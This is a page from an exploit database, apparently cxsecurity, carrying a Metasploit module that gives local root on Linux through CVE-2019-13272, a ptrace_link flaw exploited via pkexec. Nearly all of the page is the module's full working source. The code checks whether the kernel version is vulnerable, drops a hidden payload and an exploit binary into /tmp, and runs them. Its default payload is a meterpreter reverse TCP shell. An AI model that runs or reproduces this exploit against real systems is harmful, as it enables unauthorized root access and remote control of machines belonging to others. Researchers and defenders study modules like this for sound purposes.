Linux Polkit pkexec Helper PTRACE_TRACEME Local Root

2019.10.24
Credit: Brendan Coles
Risk: High
Local: Yes
Remote: No
CWE: CWE-264


CVSS Base Score: 7.2/10
Impact Subscore: 10/10
Exploitability Subscore: 3.9/10
Exploit range: Local
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Post::Linux::Priv include Msf::Post::Linux::Kernel include Msf::Post::Linux::System include Msf::Post::Linux::Compile include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'Linux Polkit pkexec helper PTRACE_TRACEME local root exploit', 'Description' => %q{ This module exploits an issue in ptrace_link in kernel/ptrace.c before Linux kernel 5.1.17. This issue can be exploited from a Linux desktop terminal, but not over an SSH session, as it requires execution from within the context of a user with an active Polkit agent. In the Linux kernel before 5.1.17, ptrace_link in kernel/ptrace.c mishandles the recording of the credentials of a process that wants to create a ptrace relationship, which allows local users to obtain root access by leveraging certain scenarios with a parent-child process relationship, where a parent drops privileges and calls execve (potentially allowing control by an attacker). One contributing factor is an object lifetime issue (which can also cause a panic). Another contributing factor is incorrect marking of a ptrace relationship as privileged, which is exploitable through (for example) Polkit's pkexec helper with PTRACE_TRACEME. }, 'License' => MSF_LICENSE, 'Author' => [ 'Jann Horn', # Discovery and exploit 'bcoles', # Metasploit module 'timwr', # Metasploit module ], 'References' => [ ['CVE', '2019-13272'], ['EDB', '47133'], ['PACKETSTORM', '153663'], ['URL', 'https://github.com/bcoles/kernel-exploits/tree/master/CVE-2019-13272'], ['URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1903'], ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X64 ], 'Targets' => [[ 'Auto', {} ]], 'DefaultOptions' => { 'Payload' => 'linux/x64/meterpreter/reverse_tcp', 'PrependFork' => true, }, 'DisclosureDate' => 'Jul 4 2019')) register_advanced_options [ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end def check # Introduced in 4.10, but also backported # Patched in 4.4.185, 4.9.185, 4.14.133, 4.19.58, 5.1.17 release = kernel_release v = Gem::Version.new release.split('-').first if v >= Gem::Version.new('5.1.17') || v < Gem::Version.new('3') vprint_error "Kernel version #{release} is not vulnerable" return CheckCode::Safe end vprint_good "Kernel version #{release} appears to be vulnerable" unless command_exists? 'pkexec' vprint_error 'pkexec is not installed' return CheckCode::Safe end vprint_good 'pkexec is installed' arch = kernel_hardware unless arch.include? 'x86_64' vprint_error "System architecture #{arch} is not supported" return CheckCode::Safe end vprint_good "System architecture #{arch} is supported" loginctl_output = cmd_exec('loginctl --no-ask-password show-session "$XDG_SESSION_ID" | grep Remote') if loginctl_output =~ /Remote=yes/ print_warning 'This is exploit requires a valid policykit session (it cannot be executed over ssh)' return CheckCode::Safe end CheckCode::Appears end def exploit if is_root? && !datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end unless check == CheckCode::Appears unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end unless writable? datastore['WritableDir'] fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable" end payload_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}" upload_and_chmodx(payload_file, generate_payload_exe) register_file_for_cleanup(payload_file) exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}" if live_compile? vprint_status 'Live compiling exploit on system...' upload_and_compile exploit_file, exploit_data('CVE-2019-13272', 'poc.c') else vprint_status 'Dropping pre-compiled exploit on system...' upload_and_chmodx exploit_file, exploit_data('CVE-2019-13272', 'exploit') end register_file_for_cleanup(exploit_file) print_status("Executing exploit '#{exploit_file}'") result = cmd_exec("echo #{payload_file} | #{exploit_file}") print_status("Exploit result:\n#{result}") end end


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top